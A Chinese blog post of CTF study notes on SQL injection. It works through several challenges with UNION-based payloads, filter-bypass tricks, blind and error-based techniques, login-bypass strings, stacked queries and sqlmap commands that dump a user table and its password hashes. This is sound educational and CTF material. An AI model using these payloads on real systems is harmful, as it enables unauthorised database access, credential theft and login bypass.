sql注入

1.基本步骤

eg1:https://www.jianshu.com/p/078df7a35671

例题:“百度杯”CTF比赛 九月场SQL

tips:用<>绕过敏感词过滤

1.得到数据库名称为sqli
http://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,database(),3 


2.得到表明为info
http://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,group_concat(table_name),3  from information_schema.tables where table_schema='sqli'

3.得到列名为flAg_T5ZNdrm
http://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,group_concat(column_name),3  from information_schema.columns where table_name='info'

4.得到flag
http://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,flAg_T5ZNdrm,3  from info

eg2:ics-04

c3tlwDmIn23 | 2f8667f381ff50ced6a3edc259260ba9 
step1:
pmt' union select 1,2,3,4 limit 1,1# 
3

step2:
pmt' union select 1,2,group_concat(schema_name),4 from information_schema.schemata limit 1,1#
information_schema,cetc004,mysql,performance_schema

step3:
pmt' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='cetc004' limit 1,1#
user

step4:
pmt' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='cetc004' limit 1,1#
username,password,question,answer


step5:
pmt' union select 1,2,group_concat(char(58),username,',',password,',',question,',',answer),4 from cetc004.user limit 1,1#

c3tlwDmIn23,2f8667f381ff50ced6a3edc259260ba9,cetc,cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds,
:pmt,202cb962ac59075b964b07152d234b70,123,123,
:c3tlwDmIn23,202cb962ac59075b964b07152d234b70,123,123

 

2.常见sql注入

(1)宽字节注入

(2)基于约束的注入

(3)报错注入

       (3-1)concat+rand()+group_by()导致主键重复

               floor(rand(0)*2)原理讲解

       (3-2)Xpath报错     原理

       (3-3)exp函数报错

(4)基于时间的盲注

        (4-1)sleep函数

        (4-2)Benchmark函数

        (4-3)笛卡尔积

 #笛卡尔积(因为连接表是一个很耗时的操作)
     AxB=A和B中每个元素的组合所组成的集合,就是连接表
     SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
     select * from table_name A, table_name B
     select * from table_name A, table_name B,table_name C
     select count(*) from table_name A, table_name B,table_name C  表可以是同一张表

        (4-4)get_lock函数加锁机制

Select get_lock(key,timeout) from test;
Select release_lock(key) from test;

        (4-5)RLIKE
                     通过rpad或repeat构造长字符串,加以计算量大的pattern,通过repeat的参数可以控制延时长短。

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.27 sec)

(5)利用insert、update和delete注入获得数据

         (5-1)insert注入

         (5-2)update注入

                     UPdate 延时盲注之小技巧

         (5-3)delete延时注入

(6)堆叠注入-2019强网杯"随便注"学习

3.常用模板

   (3-1)  万能语句

   (3-2)SQL盲注脚本模板

               (3-2-1)时间盲注 

                               requests发请求时timeout配置及异常捕获

4.其他补充

   (4-1)万能密码

select * from admin where username='' and password = '';

 1.admin'#


select * from admin where username='admin'#' and password = '';

      2.'+' '+'

sql中会讲字符串当做0来处理

万能密码2

select * from admin where username=“'+'” and password = “'+'”;
select * from admin where username=0 and password = 0;

【注意】这种方法针对所有非数字开头的字符串才会认为是以0开头,否则就会失效

3.aaA'='
 

select * from admin where username='aAa'='' and password = 'aAa'='';

将username='aAa'=''
1、username='aAa'返回false
2、false=''即0=1返回1
3、select * from admin where username='aAa'='' and password = 'aAa'='';即变成了
select * from admin where 1 and 1;

(4-2)\N:利用\N略去空格

 

 

(4-2)堆叠注入

题目:supersqli

其他方法

1';show tables;#
1919810931114514

1';show columns from `1919810931114514`;#
flag

#预处理语句
1';Set @sql=concat('sel','ect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

总结:1、MySQL的SQL预处理(Prepared)

           2、strstr不区分大小写

5、sqlmap

sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump

用sqlmap跑post型注入

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值